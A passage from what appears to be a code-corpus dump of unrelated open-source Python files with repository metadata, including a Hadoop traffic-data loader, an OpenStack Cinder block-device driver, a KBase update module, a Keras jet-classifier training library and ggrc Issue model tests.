lambda k: sum(max(0, ceil((x - k * B) / (A - B))) for x in h) <= k,
10**10,
0
)
# Output
print(ans)
avg_line_length: 15.5 | max_line_length: 71 | alphanum_fraction: 0.476427

hexsha: 4744f149b50ff979daa103c28ad272f1f00d7722 | size: 5,394 | ext: py | lang: Python
max_stars: path=hadoop/hadoopget.py, repo=gjgj821/traffic_prediction, head=ceed31ccf9cdaa83cfa7912111bf0ec2e699467e, licenses=["MIT"], count=3, event_min=2017-08-11T02:29:45.000Z, event_max=2021-08-05T03:05:57.000Z
max_issues: path=hadoop/hadoopget.py, repo=gjgj821/traffic_prediction, head=ceed31ccf9cdaa83cfa7912111bf0ec2e699467e, licenses=["MIT"], count=null, event_min=null, event_max=null
max_forks: path=hadoop/hadoopget.py, repo=gjgj821/traffic_prediction, head=ceed31ccf9cdaa83cfa7912111bf0ec2e699467e, licenses=["MIT"], count=2, event_min=2015-09-07T08:10:12.000Z, event_max=2016-03-13T08:00:25.000Z
content:
# coding=utf-8
import os
from core.relative import Relative, Parent
__author__ = 'GaoJie'
# Load the Hadoop result sets and compute over them
DATA_DIR = 'data/mapred/'
# merge -------- should map to id
# adx :int, --U 0
# device_device_type :int, --u 1
# detworkConnection_connection_type :int, --U 2
# device_os :int, --U 3
# device_os_version :int, --U 3
# detworkConnection_carrier_id :int, --U 4
# app_category_id :int, --U 5
# location_geo_criteria_id :int, --U 6
# device_brand :chararray, --u 7
# device_model :chararray, --u 7
# app_limei_app_id :int, --U 8
DIM_LIST = ['adx', 'DeviceType', 'ConnectionType', 'OS', 'CarrierName', 'Categorys', 'Citys', 'DeviceModel', 'AppId']
NEED_RELATE = ['DeviceModel']
NEED_PATENT = ['Citys', 'OS', 'DeviceModel']
data = None
def get_sum(date_time, field_map, table, sum_field='Requests', date_field='Datetime', is_train=True, where='1'):
"""
Get the total for a combination of dimensions; proxy interface, kept in sync with dbget
"""
return data.get_sum(field_map)
def get_group(date_time, field, table, sum_field='Requests', date_field='Datetime', is_train=True, where='1'):
"""
Get the grouping info for a combination of dimensions; proxy interface, kept in sync with dbget
"""
return data.get_group(field)
class HadoopData:
def __init__(self):
self.term_map = [0,{},{},{},{},{}]
self.need_parent_index = []
for item in NEED_PATENT:
self.need_parent_index.append(DIM_LIST.index(item))
self.need_relate_index = []
for item in NEED_RELATE:
self.need_relate_index.append(DIM_LIST.index(item))
pass
def load(self, lines):
"""
Load the data
"""
for line in lines:
line = line.strip().decode('utf-8')
dim_sum, dim_key, value_list, value_sum = self.parse(line)
this_map = self.term_map[dim_sum]
if dim_sum == 0:
self.term_map[dim_sum] = value_sum
continue
if dim_key not in this_map:
this_map[dim_key] = {}
this_dim = this_map[dim_key]
this_dim[u'.'.join(value_list)] = value_sum
# Add parent-level statistics
for key, index in enumerate(self.need_parent_index):
if dim_key & ( 1 << index ):
t = 0
for i in xrange(index):
if dim_key & ( 1 << i):
t += 1
# print t
# print value_list
# Get all parent values
parent = Parent.mapping_value(DIM_LIST[index], value_list[t])
if not parent:
continue
parent_value_list = value_list
for p in parent:
parent_value_list[t] = p
parent_value_key = '.'.join(parent_value_list)
if parent_value_key not in this_dim:
this_dim[parent_value_key] = 0
this_dim[parent_value_key] += value_sum
def get_sum(self, field_map):
"""
Get the targeting total
"""
dim_sum = len(field_map.keys())
this_map = self.term_map[dim_sum]
if dim_sum == 0:
#print this_map
return this_map
dim_key, value_list = self.get_key(field_map)
value_key = u'.'.join(value_list)
#print field_map
#print dim_key, value_key
if dim_key not in this_map:
return 0
if value_key not in this_map[dim_key]:
return 0
return this_map[dim_key][value_key]
def get_group(self, dim):
index = DIM_LIST.index(dim)
dim_key = 0 | 1 << index
this_map = self.term_map[1]
if dim_key not in this_map:
return []
group_list = []
for key, value in this_map[dim_key].items():
group_list.append((key,value))
return group_list
@staticmethod
def get_key(term_map):
dim_key = 0
value_list = []
#print term_map
for dim, value in term_map.items():
index = DIM_LIST.index(dim)
dim_key |= 1 << index
value_list.append(value)
return dim_key, value_list
def parse(self, string):
info = string.split("\t")
dim_info = info[0].split('.')
dim_sum = len(dim_info) - 1
dim_key = int(dim_info[0])
value_list = dim_info[1:]
for key, index in enumerate(self.need_relate_index):
if dim_key & ( 1 << index ):
t = 0
for i in xrange(index):
if dim_key & ( 1 << i):
t += 1
value_list[t] = str(Relative.mapping_value(DIM_LIST[index], value_list[t]))
return dim_sum, dim_key, value_list, int(info[1])
def reload(self):
self.term_map = [0, {}, {}, {}, {}, {}]
files = os.listdir(DATA_DIR)
for f in files:
fo = open(DATA_DIR + f, 'r')
lines = fo.readlines()
fo.close()
self.load(lines)
def init_hapood():
data = HadoopData()
data.reload()
avg_line_length: 34.139241 | max_line_length: 117 | alphanum_fraction: 0.50927

hexsha: 4a36d80f13469b66c184e6d25b179945c9df47d1 | size: 1,017 | ext: py | lang: Python
max_stars: path=cma-es/cma&mse&quad&pow/Ss.py, repo=luzhijun/-, head=c9a7f39fd033a3ba3c57acbbd309c05ac17e6bef, licenses=["Apache-2.0"], count=17, event_min=2016-11-18T03:15:14.000Z, event_max=2022-01-09T07:50:56.000Z
max_issues: path=cma-es/cma&mse&quad&pow/Ss.py, repo=luzhijun/-, head=c9a7f39fd033a3ba3c57acbbd309c05ac17e6bef, licenses=["Apache-2.0"], count=null, event_min=null, event_max=null
max_forks: path=cma-es/cma&mse&quad&pow/Ss.py, repo=luzhijun/-, head=c9a7f39fd033a3ba3c57acbbd309c05ac17e6bef, licenses=["Apache-2.0"], count=7, event_min=2016-11-20T10:20:57.000Z, event_max=2021-04-20T05:29:57.000Z
content:
#!usr/bin/env python
#encoding: utf-8
__author__="luzhijun"
'''
Generate the data sets. dataSet[0:3] holds noisy data generated with a polynomial function; dataSet[3:6] holds noisy data generated with an exponential function;
realDataSet[0] stores the true data from the polynomial function, realDataSet[1] stores the true data from the exponential function
'''
import funcs
import numpy as np
x1=np.linspace(0,20,150)
x2=np.hstack((np.random.exponential(5,300),x1))
x2.sort()
x3=np.hstack((np.random.exponential(1,300),x1))
x3.sort()
x4=np.linspace(0,20,150)
x5=np.hstack((np.random.exponential(5,300),x4))
x5.sort()
x6=np.hstack((np.random.exponential(1,300),x4))
x6.sort()
dataSet=[]
p1=[2,1,0] # polynomial function parameters
p2=[0.5,2] # exponential function parameters
y1=list(map(funcs.f11(p1),x1))
dataSet.append([x1,y1])
y2=list(map(funcs.f11(p1),x2))
dataSet.append([x2,y2])
y3=list(map(funcs.f11(p1),x3))
dataSet.append([x3,y3])
y4=list(map(funcs.f21(p2),x4))
dataSet.append([x4,y4])
y5=list(map(funcs.f21(p2),x5))
dataSet.append([x5,y5])
y6=list(map(funcs.f21(p2),x6))
dataSet.append([x6,y6])
realDataSet=[]
y1r=list(map(funcs.f1(p1),x1))
realDataSet.append([x1,y1r])
y2r=list(map(funcs.f2(p2),x4))
realDataSet.append([x4,y2r])
avg_line_length: 22.6 | max_line_length: 58 | alphanum_fraction: 0.711898

hexsha: bf6840aef5379a3539fe14e0205bf1725f85f79e | size: 8,666 | ext: py | lang: Python
max_stars: path=cinder/volume/drivers/block_device.py, repo=rackerlabs/cinder, head=4295ff0a64f781c3546f6c6e0816dbb8100133cb, licenses=["Apache-2.0"], count=1, event_min=2019-02-08T05:24:58.000Z, event_max=2019-02-08T05:24:58.000Z
max_issues: path=cinder/volume/drivers/block_device.py, repo=rackerlabs/cinder, head=4295ff0a64f781c3546f6c6e0816dbb8100133cb, licenses=["Apache-2.0"], count=null, event_min=null, event_max=null
max_forks: path=cinder/volume/drivers/block_device.py, repo=rackerlabs/cinder, head=4295ff0a64f781c3546f6c6e0816dbb8100133cb, licenses=["Apache-2.0"], count=null, event_min=null, event_max=null
content:
# Copyright (c) 2013 Mirantis, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import importutils
from cinder import context
from cinder.db.sqlalchemy import api
from cinder import exception
from cinder.i18n import _, _LI
from cinder.image import image_utils
from cinder.volume import driver
from cinder.volume import utils as volutils
LOG = logging.getLogger(__name__)
volume_opts = [
cfg.ListOpt('available_devices',
default=[],
help='List of all available devices'),
]
CONF = cfg.CONF
CONF.register_opts(volume_opts)
class BlockDeviceDriver(driver.BaseVD, driver.LocalVD, driver.CloneableVD,
driver.CloneableImageVD, driver.TransferVD):
VERSION = '2.1.0'
def __init__(self, *args, **kwargs):
super(BlockDeviceDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(volume_opts)
self.backend_name = \
self.configuration.safe_get('volume_backend_name') or "BlockDev"
target_driver =\
self.target_mapping[self.configuration.safe_get('iscsi_helper')]
self.target_driver = importutils.import_object(
target_driver,
configuration=self.configuration,
db=self.db,
executor=self._execute)
def check_for_setup_error(self):
pass
def create_volume(self, volume):
device = self.find_appropriate_size_device(volume['size'])
LOG.info(_LI("Create %(volume)s on %(device)s"),
{"volume": volume['name'], "device": device})
return {
'provider_location': device,
}
def delete_volume(self, volume):
"""Deletes a logical volume."""
dev_path = self.local_path(volume)
if not dev_path or dev_path not in \
self.configuration.available_devices:
return
if os.path.exists(dev_path) and \
self.configuration.volume_clear != 'none':
volutils.clear_volume(
self._get_device_size(dev_path), dev_path,
volume_clear=self.configuration.volume_clear,
volume_clear_size=self.configuration.volume_clear_size)
def local_path(self, volume):
if volume['provider_location']:
path = volume['provider_location'].rsplit(" ", 1)
return path[-1]
else:
return None
def copy_image_to_volume(self, context, volume, image_service, image_id):
"""Fetch the image from image_service and write it to the volume."""
image_utils.fetch_to_raw(context,
image_service,
image_id,
self.local_path(volume),
self.configuration.volume_dd_blocksize,
size=volume['size'])
def copy_volume_to_image(self, context, volume, image_service, image_meta):
"""Copy the volume to the specified image."""
image_utils.upload_volume(context,
image_service,
image_meta,
self.local_path(volume))
def create_cloned_volume(self, volume, src_vref):
LOG.info(_LI('Creating clone of volume: %s'), src_vref['id'])
device = self.find_appropriate_size_device(src_vref['size'])
volutils.copy_volume(
self.local_path(src_vref), device,
self._get_device_size(device) * 2048,
self.configuration.volume_dd_blocksize,
execute=self._execute)
return {
'provider_location': device,
}
def get_volume_stats(self, refresh=False):
if refresh:
self._update_volume_stats()
return self._stats
def _update_volume_stats(self):
"""Retrieve stats info from volume group."""
dict_of_devices_sizes = self._devices_sizes()
used_devices = self._get_used_devices()
total_size = 0
free_size = 0
for device, size in dict_of_devices_sizes.items():
if device not in used_devices:
free_size += size
total_size += size
LOG.debug("Updating volume stats")
backend_name = self.configuration.safe_get('volume_backend_name')
data = {'total_capacity_gb': total_size / 1024,
'free_capacity_gb': free_size / 1024,
'reserved_percentage': self.configuration.reserved_percentage,
'QoS_support': False,
'volume_backend_name': backend_name or self.__class__.__name__,
'vendor_name': "Open Source",
'driver_version': self.VERSION,
'storage_protocol': 'unknown'}
self._stats = data
def _get_used_devices(self):
lst = api.volume_get_all_by_host(context.get_admin_context(),
self.host)
used_devices = set()
for volume in lst:
local_path = self.local_path(volume)
if local_path:
used_devices.add(local_path)
return used_devices
def _get_device_size(self, dev_path):
out, _err = self._execute('blockdev', '--getsz', dev_path,
run_as_root=True)
size_in_m = int(out)
return size_in_m / 2048
def _devices_sizes(self):
available_devices = self.configuration.available_devices
dict_of_devices_sizes = {}
for device in available_devices:
dict_of_devices_sizes[device] = self._get_device_size(device)
return dict_of_devices_sizes
def find_appropriate_size_device(self, size):
dict_of_devices_sizes = self._devices_sizes()
free_devices = (set(self.configuration.available_devices) -
self._get_used_devices())
if not free_devices:
raise exception.CinderException(_("No free disk"))
possible_device = None
possible_device_size = None
for device in free_devices:
dev_size = dict_of_devices_sizes[device]
if size * 1024 <= dev_size and (possible_device is None or
dev_size < possible_device_size):
possible_device = device
possible_device_size = dev_size
if possible_device:
return possible_device
else:
raise exception.CinderException(_("No big enough free disk"))
# ####### Interface methods for DataPath (Target Driver) ########
def ensure_export(self, context, volume):
volume_path = self.local_path(volume)
model_update = \
self.target_driver.ensure_export(
context,
volume,
volume_path)
return model_update
def create_export(self, context, volume, connector):
volume_path = self.local_path(volume)
export_info = self.target_driver.create_export(context,
volume,
volume_path)
return {
'provider_location': export_info['location'] + ' ' + volume_path,
'provider_auth': export_info['auth'],
}
def remove_export(self, context, volume):
self.target_driver.remove_export(context, volume)
def initialize_connection(self, volume, connector):
if connector['host'] != volutils.extract_host(volume['host'], 'host'):
return self.target_driver.initialize_connection(volume, connector)
else:
return {
'driver_volume_type': 'local',
'data': {'device_path': self.local_path(volume)},
}
def validate_connector(self, connector):
return self.target_driver.validate_connector(connector)
def terminate_connection(self, volume, connector, **kwargs):
pass
avg_line_length: 37.842795 | max_line_length: 79 | alphanum_fraction: 0.608701

hexsha: 221235b5ad45cb338763c2710a5eb813260a6298 | size: 6,931 | ext: py | lang: Python
max_stars: path=lib/relation_engine_bulk_update/relation_engine_bulk_updateImpl.py, repo=kbaseapps/relation_engine_bulk_update, head=04638d3d9e87eb9dc5afe30f96d1e4b84f633b8b, licenses=["MIT"], count=null, event_min=null, event_max=null
max_issues: path=lib/relation_engine_bulk_update/relation_engine_bulk_updateImpl.py, repo=kbaseapps/relation_engine_bulk_update, head=04638d3d9e87eb9dc5afe30f96d1e4b84f633b8b, licenses=["MIT"], count=null, event_min=null, event_max=null
max_forks: path=lib/relation_engine_bulk_update/relation_engine_bulk_updateImpl.py, repo=kbaseapps/relation_engine_bulk_update, head=04638d3d9e87eb9dc5afe30f96d1e4b84f633b8b, licenses=["MIT"], count=null, event_min=null, event_max=null
content:
# -*- coding: utf-8 -*-
#BEGIN_HEADER
import ujson
import logging
import os
from installed_clients.CatalogClient import Catalog
from installed_clients.KBaseReportClient import KBaseReport
from installed_clients.WorkspaceClient import Workspace
from relation_engine_bulk_update.genome_collections import update_ncbi_genomes
from relation_engine_bulk_update.type_collections import update_type_collections
from relation_engine_bulk_update.workspace_object_collections import update_ws_object_collections
from relation_engine_bulk_update.sdk_module_collections import update_sdk_module_collections
#END_HEADER
class relation_engine_bulk_update:
'''
Module Name:
relation_engine_bulk_update
Module Description:
A KBase module: relation_engine_bulk_update
'''
######## WARNING FOR GEVENT USERS ####### noqa
# Since asynchronous IO can lead to methods - even the same method -
# interrupting each other, you must be *very* careful when using global
# state. A method could easily clobber the state set by another while
# the latter method is running.
######################################### noqa
VERSION = "0.0.1"
GIT_URL = "https://github.com/kbaseapps/relation_engine_bulk_update.git"
GIT_COMMIT_HASH = "06f2ee2bace04fe55436309e114de1300aed5c66"
#BEGIN_CLASS_HEADER
# Class variables and functions can be defined in this block
def make_report(self, message, ws_id):
report_info = self.kb_report.create(
{'report': {'objects_created': [],
'text_message': message},
'workspace_id': ws_id})
return {
'report_name': report_info['name'],
'report_ref': report_info['ref'],
}
#END_CLASS_HEADER
# config contains contents of config file in a hash or None if it couldn't
# be found
def __init__(self, config):
#BEGIN_CONSTRUCTOR
# Any configuration parameters that are important should be parsed and
# saved in the constructor.
self.callback_url = os.environ['SDK_CALLBACK_URL']
self.shared_folder = config['scratch']
self.re_api_url = config['re-api-url']
self.catalog = Catalog(config['catalog-url'])
self.ws = Workspace(config['workspace-url'])
self.kb_report = KBaseReport(self.callback_url)
logging.basicConfig(level=logging.INFO)
#END_CONSTRUCTOR
pass
def update_type_collections(self, ctx, params):
"""
Updates type mappings. Currently only requires a ws_id for the report
:param params: instance of mapping from String to unspecified object
:returns: instance of type "ReportResults" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN update_type_collections
message = update_type_collections(self.ws, self.re_api_url, ctx['token'])
logging.info(message)
output = self.make_report(message, params['workspace_id'])
#END update_type_collections
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method update_type_collections return value ' +
'output is not type dict as required.')
# return the results
return [output]
def update_sdk_module_collections(self, ctx, params):
"""
Updates sdk module mappings. Currently only requires a ws_id for the report
:param params: instance of mapping from String to unspecified object
:returns: instance of type "ReportResults" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN update_sdk_module_collections
message = update_sdk_module_collections(self.catalog, self.re_api_url, ctx['token'])
logging.info(message)
output = self.make_report(message, params['workspace_id'])
#END update_sdk_module_collections
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method update_sdk_module_collections return value ' +
'output is not type dict as required.')
# return the results
return [output]
def update_ws_provenance(self, ctx, params):
"""
Updates the provenance relationships for workspace objects. Currently only requires a ws_id for the report
:param params: instance of mapping from String to unspecified object
:returns: instance of type "ReportResults" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN update_ws_provenance
parsed_params = ujson.loads(params['list_ws_params'])
message = update_ws_object_collections(self.ws, self.re_api_url, ctx['token'],
parsed_params)
logging.info(message)
output = self.make_report(message, params['workspace_id'])
#END update_ws_provenance
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method update_ws_provenance return value ' +
'output is not type dict as required.')
# return the results
return [output]
def update_ncbi_genomes(self, ctx, params):
"""
Updates the ncbi_genomes. Currently only requires a ws_id for the report and a list of genome_names
:param params: instance of mapping from String to unspecified object
:returns: instance of type "ReportResults" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN update_ncbi_genomes
message = update_ncbi_genomes(self.ws, self.re_api_url, ctx['token'], params)
logging.info(message)
output = {}
#END update_ncbi_genomes
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method update_ncbi_genomes return value ' +
'output is not type dict as required.')
# return the results
return [output]
def status(self, ctx):
#BEGIN_STATUS
returnVal = {'state': "OK",
'message': "",
'version': self.VERSION,
'git_url': self.GIT_URL,
'git_commit_hash': self.GIT_COMMIT_HASH}
#END_STATUS
return [returnVal]
avg_line_length: 41.502994 | max_line_length: 114 | alphanum_fraction: 0.654307

hexsha: 54ae3700c4d1684b98156e9d439499b64165f241 | size: 9,991 | ext: py | lang: Python
max_stars: path=train/gen/adv/models/particles/v4_noetaphi_trunc7_limit100/lib.py, repo=sammysiegel/SubtLeNet, head=94d1507a8a7c60548b59400109b6c4086ad83141, licenses=["MIT"], count=null, event_min=null, event_max=null
max_issues: path=train/gen/adv/models/particles/v4_noetaphi_trunc7_limit100/lib.py, repo=sammysiegel/SubtLeNet, head=94d1507a8a7c60548b59400109b6c4086ad83141, licenses=["MIT"], count=null, event_min=null, event_max=null
max_forks: path=train/gen/adv/models/particles/v4_noetaphi_trunc7_limit100/lib.py, repo=sammysiegel/SubtLeNet, head=94d1507a8a7c60548b59400109b6c4086ad83141, licenses=["MIT"], count=2, event_min=2019-07-08T20:18:22.000Z, event_max=2020-06-01T20:04:08.000Z
content:
#!/usr/bin/env python2.7
from _common import *
from ..generators.gen import make_coll, generate, get_dims
from ..generators import gen as generator
'''
some global definitions
'''
NEPOCH = 50
VERSION = 4
MODELDIR = environ.get('MODELDIR', 'models/') + '/particles/'
BASEDIR = environ['BASEDIR']
OPTIMIZER = 'Adam'
_APOSTLE = None
train_opts = {
'learn_mass' : True,
'learn_pt' : True,
}
# must be called!
def instantiate(trunc=4, limit=50):
global _APOSTLE
generator.truncate = trunc
config.limit = limit
_APOSTLE = 'v%s_trunc%i_limit%i'%(str(VERSION), generator.truncate, config.limit)
system('mkdir -p %s/%s/'%(MODELDIR,_APOSTLE))
system('cp -v %s %s/%s/trainer.py'%(sys.argv[0], MODELDIR, _APOSTLE))
system('cp -v %s %s/%s/lib.py'%(__file__.replace('.pyc','.py'), MODELDIR, _APOSTLE))
# instantiate data loaders
top = make_coll(BASEDIR + '/PARTITION/Top_*_CATEGORY.npy')
qcd = make_coll(BASEDIR + '/PARTITION/QCD_*_CATEGORY.npy')
data = [top, qcd]
dims = get_dims(top)
with open('%s/%s/setup.py'%(MODELDIR, _APOSTLE),'w') as fsetup:
fsetup.write('''
from subtlenet import config
from subtlenet.generators import gen as generator
from subtlenet.utils import set_processor
config.limit = %i
generator.truncate = %i
set_processor("%s")
'''%(config.limit, generator.truncate, utils.get_processor()))
return data, dims
'''
first build the classifier!
'''
# set up data
def setup_data(data):
opts = {}; opts.update(train_opts)
gen = {
'train' : generate(data, partition='train', batch=500, **opts),
'validation' : generate(data, partition='validate', batch=2000, **opts),
'test' : generate(data, partition='test', batch=10, **opts),
}
return gen
def setup_adv_data(data):
opts = {'decorr_mass':True,
'window':True}
opts.update(train_opts)
gen = {
'train' : generate(data, partition='train', batch=1000, **opts),
'validation' : generate(data, partition='validate', batch=2000, **opts),
'test' : generate(data, partition='test', batch=10, **opts),
}
return gen
def compilation_args(name, **kwargs):
if name == 'classifier':
return {
'optimizer' : getattr(keras_objects, OPTIMIZER)(lr=0.0005),
'loss' : 'categorical_crossentropy',
'metrics' : ['accuracy']
}
if name == 'adversary':
N = range(kwargs['N'])
return {
'optimizer' : getattr(keras_objects, OPTIMIZER)(lr=0.00025),
'loss' : ['categorical_crossentropy'] + [kwargs['loss'] for _ in N],
'loss_weights' : [kwargs['w_clf']] + [kwargs['w_adv'] for _ in N]
}
# this is purely a discriminatory classifier
def build_classifier(dims):
input_particles = Input(shape=(dims[1], dims[2]), name='input_particles')
input_mass = Input(shape=(1,), name='input_mass')
input_pt = Input(shape=(1,), name='input_pt')
inputs = [input_particles, input_mass, input_pt]
LSTMImplementation = CuDNNLSTM if (utils.get_processor() == 'gpu') else LSTM
# now build the particle network
h = BatchNormalization(momentum=0.6, name='f_bn0')(input_particles)
h = Conv1D(32, 2, activation='relu', kernel_initializer='lecun_uniform',
padding='same', name='f_c0')(h)
h = BatchNormalization(momentum=0.6, name='f_bn1')(h)
h = Conv1D(16, 4, activation='relu', kernel_initializer='lecun_uniform',
padding='same', name='f_c1')(h)
h = BatchNormalization(momentum=0.6, name='f_bn2')(h)
h = LSTMImplementation(100, name='f_lstm')(h)
h = BatchNormalization(momentum=0.6, name='f_bn3')(h)
h = Dense(100, activation='relu', kernel_initializer='lecun_uniform', name='f_d0')(h)
h = BatchNormalization(momentum=0.6, name='f_bn4')(h)
h = Dense(50, activation='relu', kernel_initializer='lecun_uniform', name='f_d1')(h)
h = BatchNormalization(momentum=0.6, name='f_bn5')(h)
h = Dense(50, activation='relu', kernel_initializer='lecun_uniform', name='f_d2')(h)
h = BatchNormalization(momentum=0.6, name='f_bn6')(h)
h = Dense(10, activation='relu', kernel_initializer='lecun_uniform', name='f_d3')(h)
h = BatchNormalization(momentum=0.6, name='f_bn7')(h)
particles_final = h
# merge everything
to_merge = [particles_final, input_mass, input_pt]
h = concatenate(to_merge, name='f_cc0')
for i in xrange(2):
h = Dense(50, activation='tanh', name='u_xd%i'%i)(h)
h = BatchNormalization(momentum=0.6, name='u_xbn%i'%i)(h)
y_hat = Dense(config.n_truth, activation='softmax', name='y_hat')(h)
classifier = Model(inputs=inputs, outputs=[y_hat])
for l in classifier.layers:
l.freezable = l.name.startswith('f_')
#classifier.compile(optimizer=Adam(lr=0.0002),
classifier.compile(**compilation_args('classifier'))
print '########### CLASSIFIER ############'
classifier.summary()
print '###################################'
return classifier
def build_adversary(clf, loss, scale, w_clf, w_adv, n_outputs=1):
if loss == 'mean_squared_error':
config.n_decorr_bins = 1
y_hat = clf.outputs[0]
inputs= clf.inputs
kin_hats = Adversary(config.n_decorr_bins, n_outputs=1, scale=scale)(y_hat)
adversary = Model(inputs=inputs,
outputs=[y_hat]+kin_hats)
adversary.compile(**compilation_args('adversary',
w_clf=w_clf,
w_adv=w_adv,
N=n_outputs,
loss=loss))
print '########### ADVERSARY ############'
adversary.summary()
print '###################################'
return adversary
def build_old_classifier(dims):
input_particles = Input(shape=(dims[1], dims[2]), name='input_particles')
input_mass = Input(shape=(1,), name='input_mass')
input_pt = Input(shape=(1,), name='input_pt')
inputs = [input_particles, input_mass, input_pt]
# now build the particle network
h = BatchNormalization(momentum=0.6)(input_particles)
h = Conv1D(32, 2, activation='relu', kernel_initializer='lecun_uniform', padding='same')(h)
h = BatchNormalization(momentum=0.6)(h)
h = Conv1D(16, 4, activation='relu', kernel_initializer='lecun_uniform', padding='same')(h)
h = BatchNormalization(momentum=0.6)(h)
h = CuDNNLSTM(100)(h)
h = BatchNormalization(momentum=0.6)(h)
h = Dense(100, activation='relu', kernel_initializer='lecun_uniform')(h)
particles_final = BatchNormalization(momentum=0.6)(h)
# merge everything
to_merge = [particles_final, input_mass, input_pt]
h = concatenate(to_merge)
for i in xrange(1,5):
h = Dense(50, activation='tanh')(h)
# if i%2:
# h = Dropout(0.1)(h)
h = BatchNormalization(momentum=0.6)(h)
y_hat = Dense(config.n_truth, activation='softmax', name='y_hat')(h)
classifier = Model(inputs=inputs, outputs=[y_hat])
#classifier.compile(optimizer=Adam(lr=0.0002),
classifier.compile(optimizer=getattr(keras_objects, OPTIMIZER)(lr=0.0005),
loss='categorical_crossentropy',
metrics=['accuracy'])
print '########### CLASSIFIER ############'
classifier.summary()
print '###################################'
return classifier
def partial_freeze(model, compargs):
clone = Model(inputs=model.inputs, outputs=model.outputs)
for l in clone.layers:
if hasattr(l, 'freezable') and l.freezable:
l.trainable = False
clone.compile(**compargs)
return clone
# train any model
def train(model, name, train_gen, validation_gen, save_clf_params=None):
if save_clf_params is not None:
callbacks = [PartialModelCheckpoint(filepath='%s/%s/%s_clf_best.h5'%(MODELDIR,_APOSTLE,name),
save_best_only=True, verbose=True,
**save_clf_params)]
save_clf = save_clf_params['partial_model']
else:
save_clf = model
callbacks = []
callbacks += [ModelCheckpoint('%s/%s/%s_best.h5'%(MODELDIR,_APOSTLE,name),
save_best_only=True, verbose=True)]
def save_classifier(name_=name, model_=save_clf):
model_.save('%s/%s/%s.h5'%(MODELDIR,_APOSTLE,name_))
def save_and_exit(signal=None, frame=None):
save_classifier()
exit(1)
signal.signal(signal.SIGINT, save_and_exit)
model.fit_generator(train_gen,
steps_per_epoch=3000,
epochs=NEPOCH,
validation_data=validation_gen,
validation_steps=2000,
callbacks = callbacks,
)
save_classifier()
def infer(modelh5, name):
model = load_model(modelh5,
custom_objects={'DenseBroadcast':DenseBroadcast,
'GradReverseLayer':GradReverseLayer})
model.summary()
coll = generator.make_coll(BASEDIR + '/PARTITION/*_CATEGORY.npy')
msd_norm_factor = 1. / config.max_mass
pt_norm_factor = 1. / (config.max_pt - config.min_pt)
msd_index = config.gen_singletons['msd']
pt_index = config.gen_singletons['pt']
def predict_t(data):
msd = data['singletons'][:,msd_index] * msd_norm_factor
pt = (data['singletons'][:,pt_index] - config.min_pt) * pt_norm_factor
if msd.shape[0] > 0:
particles = data['particles'][:,:config.limit,:generator.truncate]
r_t = model.predict([particles,msd,pt])[:,config.n_truth-1]
else:
r_t = np.empty((0,))
return r_t
print 'loaded from',modelh5,
print 'saving to',name
coll.infer(['singletons','particles'], f=predict_t, name=name, partition='test')
| 36.068592
| 102
| 0.610049
|
446fb4a33cf0356102d8955b158c6b5f39970224
| 15,442
|
py
|
Python
|
test/integration/ggrc/models/test_issue.py
|
HLD/ggrc-core
|
9bdc0fc6ca9e252f4919db682d80e360d5581eb4
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
test/integration/ggrc/models/test_issue.py
|
HLD/ggrc-core
|
9bdc0fc6ca9e252f4919db682d80e360d5581eb4
|
[
"ECL-2.0",
"Apache-2.0"
] | 10
|
2018-07-06T00:04:23.000Z
|
2021-02-26T21:13:20.000Z
|
test/integration/ggrc/models/test_issue.py
|
HLD/ggrc-core
|
9bdc0fc6ca9e252f4919db682d80e360d5581eb4
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2017-11-11T22:16:56.000Z
|
2017-11-11T22:16:56.000Z
|
# Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Tests for Issue model."""
from ggrc import db
from ggrc.models import all_models
from integration.ggrc import generator
from integration.ggrc import TestCase, Api
from integration.ggrc.models import factories
class TestIssue(TestCase):
""" Test Issue class. """
def setUp(self):
super(TestIssue, self).setUp()
self.api = Api()
with factories.single_commit():
audit = factories.AuditFactory()
for status in all_models.Issue.VALID_STATES:
factories.IssueFactory(audit=audit, status=status)
def test_filter_by_status(self):
"""Test Issue filtering by status."""
query_request_data = [{
'fields': [],
'filters': {
'expression': {
'left': {
'left': 'status',
'op': {'name': '='},
'right': 'Fixed'
},
'op': {'name': 'OR'},
'right': {
'left': 'status',
'op': {'name': '='},
'right': 'Fixed and Verified'
},
},
},
'object_name': 'Issue',
'permissions': 'read',
'type': 'values',
}]
response = self.api.send_request(
self.api.client.post,
data=query_request_data,
api_link="/query"
)
self.assertEqual(response.status_code, 200)
statuses = {i["status"] for i in response.json[0]["Issue"]["values"]}
self.assertEqual(statuses, {"Fixed", "Fixed and Verified"})
class TestIssueAuditMapping(TestCase):
"""Test suite to check the rules for Issue-Audit mappings."""
# pylint: disable=invalid-name
def setUp(self):
super(TestIssueAuditMapping, self).setUp()
self.generator = generator.ObjectGenerator(fail_no_json=False)
control = factories.ControlFactory()
revision = all_models.Revision.query.filter(
all_models.Revision.resource_type == control.type,
all_models.Revision.resource_id == control.id,
).first()
with factories.single_commit():
self.audit = factories.AuditFactory()
self.snapshot = factories.SnapshotFactory(parent=self.audit,
revision=revision)
self.other_audits = [factories.AuditFactory() for _ in range(2)]
self.issue_mapped = factories.IssueFactory()
self.issue_unmapped = factories.IssueFactory()
